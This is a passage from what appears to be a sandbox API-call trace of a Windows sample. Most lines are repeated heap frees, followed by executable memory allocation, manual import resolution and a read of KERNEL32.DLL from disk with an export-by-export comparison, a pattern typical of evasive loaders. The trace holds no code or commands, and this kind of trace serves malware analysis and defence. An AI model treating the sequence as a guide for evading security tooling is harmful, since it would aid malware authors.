hHeap=0x4d0000, dwFlags=0x0, lpMem=0x265b7b0 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x266e9c0 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2681bd0 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2694de0 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x26a7ff0 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x26bb200 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x26ce410 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x26e1620 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x26f4830 | out: hHeap=0x4d0000) returned 1 [0147.251] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2707a40 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x271ac50 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x272de60 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2741070 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2754280 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2767490 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x277a6a0 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x278d8b0 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x27a0ac0 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x27b3cd0 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x27c6ee0 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x27da0f0 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x27ed300 | out: hHeap=0x4d0000) returned 1 [0147.252] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2800510 | out: hHeap=0x4d0000) returned 1 [0147.257] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2813720 | out: hHeap=0x4d0000) returned 1 [0147.257] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2826930 | out: hHeap=0x4d0000) returned 1 [0147.257] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2839b40 | out: hHeap=0x4d0000) returned 1 [0147.257] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x284cd50 | out: hHeap=0x4d0000) returned 1 [0147.258] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x285ff60 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2873170 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2886380 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2899590 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x28ac7a0 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x28bf9b0 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x28d2bc0 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x28e5dd0 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x28f8fe0 | out: hHeap=0x4d0000) returned 1 [0147.259] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x290c1f0 | out: hHeap=0x4d0000) returned 1 [0147.263] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x291f400 | out: hHeap=0x4d0000) returned 1 [0147.263] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2932610 | out: hHeap=0x4d0000) returned 1 [0147.263] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2945820 | out: hHeap=0x4d0000) returned 1 [0147.263] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2958a30 | out: hHeap=0x4d0000) returned 1 [0147.263] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x296bc40 | out: hHeap=0x4d0000) returned 1 [0147.265] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x297ee50 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2992060 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x29a5270 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x29b8480 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x29cb690 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x29de8a0 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x29f1ab0 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a04cc0 | out: hHeap=0x4d0000) returned 1 [0147.266] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a17ed0 | out: hHeap=0x4d0000) returned 1 [0147.269] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a2b0e0 | out: hHeap=0x4d0000) returned 1 [0147.269] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a3e2f0 | out: hHeap=0x4d0000) returned 1 [0147.269] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a51500 | out: hHeap=0x4d0000) returned 1 [0147.269] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a64710 | out: hHeap=0x4d0000) returned 1 [0147.269] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a77920 | out: hHeap=0x4d0000) returned 1 [0147.269] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a8ab30 | out: hHeap=0x4d0000) returned 1 [0147.271] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2a9dd40 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ab0f50 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ac4160 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ad7370 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2aea580 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2afd790 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b109a0 | out: hHeap=0x4d0000) returned 1 [0147.272] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b23bb0 | out: hHeap=0x4d0000) returned 1 [0147.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b36dc0 | out: hHeap=0x4d0000) returned 1 [0147.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b49fd0 | out: hHeap=0x4d0000) returned 1 [0147.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b5d1e0 | out: hHeap=0x4d0000) returned 1 [0147.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b703f0 | out: hHeap=0x4d0000) returned 1 [0147.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b83600 | out: hHeap=0x4d0000) returned 1 [0147.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2b96810 | out: hHeap=0x4d0000) returned 1 [0147.279] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ba9a20 | out: hHeap=0x4d0000) returned 1 [0147.279] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2bbcc30 | out: hHeap=0x4d0000) returned 1 [0147.280] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2bcfe40 | out: hHeap=0x4d0000) returned 1 [0147.280] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2be3050 | out: hHeap=0x4d0000) returned 1 [0147.280] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2bf6260 | out: hHeap=0x4d0000) returned 1 [0147.280] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c09470 | out: hHeap=0x4d0000) returned 1 [0147.280] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c1c680 | out: hHeap=0x4d0000) returned 1 [0147.280] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c2f890 | out: hHeap=0x4d0000) returned 1 [0147.379] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c42aa0 | out: hHeap=0x4d0000) returned 1 [0147.379] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c55cb0 | out: hHeap=0x4d0000) returned 1 [0147.379] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c68ec0 | out: hHeap=0x4d0000) returned 1 [0147.379] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c7c0d0 | out: hHeap=0x4d0000) returned 1 [0147.379] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c8f2e0 | out: hHeap=0x4d0000) returned 1 [0147.380] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ca24f0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2cb5700 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2cc8910 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2cf0080 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d03290 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d164a0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d296b0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d3c8c0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d4fad0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d62ce0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d75ef0 | out: hHeap=0x4d0000) returned 1 [0147.381] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d89100 | out: hHeap=0x4d0000) returned 1 [0147.387] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2d9c310 | out: hHeap=0x4d0000) returned 1 [0147.390] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2daf520 | out: hHeap=0x4d0000) returned 1 [0147.390] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2dc2730 | out: hHeap=0x4d0000) returned 1 [0147.390] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2dd5940 | out: hHeap=0x4d0000) returned 1 [0147.390] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2de8b50 | out: hHeap=0x4d0000) returned 1 [0147.392] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2dfbd60 | out: hHeap=0x4d0000) returned 1 [0147.392] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e0ef70 | out: hHeap=0x4d0000) returned 1 [0147.393] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e22180 | out: hHeap=0x4d0000) returned 1 [0147.393] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e35390 | out: hHeap=0x4d0000) returned 1 [0147.393] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e485a0 | out: hHeap=0x4d0000) returned 1 [0147.393] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e5b7b0 | out: hHeap=0x4d0000) returned 1 [0147.394] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e6e9c0 | out: hHeap=0x4d0000) returned 1 [0147.395] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e81bd0 | out: hHeap=0x4d0000) returned 1 [0147.395] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2e94de0 | out: hHeap=0x4d0000) returned 1 [0147.396] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ea7ff0 | out: hHeap=0x4d0000) returned 1 [0147.396] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ebb200 | out: hHeap=0x4d0000) returned 1 [0147.396] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ece410 | out: hHeap=0x4d0000) returned 1 [0147.396] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ee1620 | out: hHeap=0x4d0000) returned 1 [0147.396] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2ef4830 | out: hHeap=0x4d0000) returned 1 [0147.399] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f07a40 | out: hHeap=0x4d0000) returned 1 [0147.399] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f1ac50 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f2de60 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f41070 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f54280 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f67490 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f7a6a0 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2f8d8b0 | out: hHeap=0x4d0000) returned 1 [0147.400] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2fa0ac0 | out: hHeap=0x4d0000) returned 1 [0147.401] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x4d0000) returned 1 [0147.401] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2fc6ee0 | out: hHeap=0x4d0000) returned 1 [0147.401] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2fda0f0 | out: hHeap=0x4d0000) returned 1 [0147.404] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2fed300 | out: hHeap=0x4d0000) returned 1 [0147.406] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x3000510 | out: hHeap=0x4d0000) returned 1 [0147.408] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x3013720 | out: hHeap=0x4d0000) returned 1 [0148.037] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0148.042] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0148.042] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0148.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0148.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0148.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0148.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0148.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0148.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0148.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0148.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0148.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0148.045] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0148.045] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0148.045] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0148.045] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0148.046] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0148.046] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0148.046] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0148.046] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0148.046] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0148.046] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fdb10 | out: hHeap=0x4d0000) returned 1 [0148.047] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x51d910 | out: hHeap=0x4d0000) returned 1 [0148.052] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dff20 | out: hHeap=0x4d0000) returned 1 [0148.055] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0148.055] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0148.055] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0148.055] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0148.055] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0148.055] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0148.058] GetProcessHeap () returned 0x4d0000 [0148.058] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x68) returned 0x4d8cd0 [0148.059] GetProcessHeap () returned 0x4d0000 [0148.059] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e91f0 [0148.061] GetProcessHeap () returned 0x4d0000 [0148.061] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x48) returned 0x4e0330 [0148.061] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0148.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0148.190] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0148.190] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0148.190] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0148.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0148.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0148.191] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0148.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0148.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0148.191] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0148.191] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0148.192] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0148.192] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0148.192] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0148.192] GetProcessHeap () returned 0x4d0000 [0148.192] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xac430) returned 0x4fc5c0 [0148.194] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0148.194] ReadFile (in: hFile=0x134, lpBuffer=0x4fc5c0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4fc5c0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0148.210] CloseHandle (hObject=0x134) returned 1 [0148.210] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0148.215] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0148.215] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0148.215] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0148.215] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0148.215] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0148.215] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0148.215] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0148.215] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0148.215] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0148.215] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0148.215] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0148.215] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0148.215] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0148.216] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0148.216] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", 